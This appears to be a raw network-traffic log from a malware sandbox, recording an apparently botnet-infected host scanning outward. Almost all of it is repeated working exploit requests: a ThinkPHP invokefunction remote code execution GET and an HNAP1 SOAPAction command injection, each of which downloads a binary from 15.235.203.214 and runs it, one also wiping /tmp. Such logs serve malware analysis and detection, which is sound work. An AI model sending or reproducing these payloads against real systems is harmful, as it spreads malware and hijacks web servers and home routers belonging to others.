                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                51192.168.2.143792295.115.64.8380
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.587728024 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                52192.168.2.144058643.140.207.908081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.588118076 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                53192.168.2.144706295.31.158.780
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.592665911 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                54192.168.2.1446688123.249.239.408081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.593224049 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                55192.168.2.144388495.59.184.23180
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.598139048 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                56192.168.2.145759670.210.95.2228081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.598886967 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                57192.168.2.145688295.57.115.18180
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.603977919 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                58192.168.2.1450876137.216.162.828081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.604518890 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                59192.168.2.145788495.136.249.3980
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.609694004 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                60192.168.2.146034661.74.35.598081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.610024929 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                61192.168.2.145477695.77.250.16680
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.614487886 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                62192.168.2.1453904196.160.77.2078081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.615160942 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                63192.168.2.144741695.182.35.19680
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.620059967 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                64192.168.2.1434418195.101.202.1218081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.620966911 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                65192.168.2.144240095.75.247.17180
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.625370979 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                66192.168.2.1438502139.94.219.978081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.625746965 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                67192.168.2.145682495.237.41.5580
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.629654884 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                68192.168.2.143522865.148.167.2258081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.630220890 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
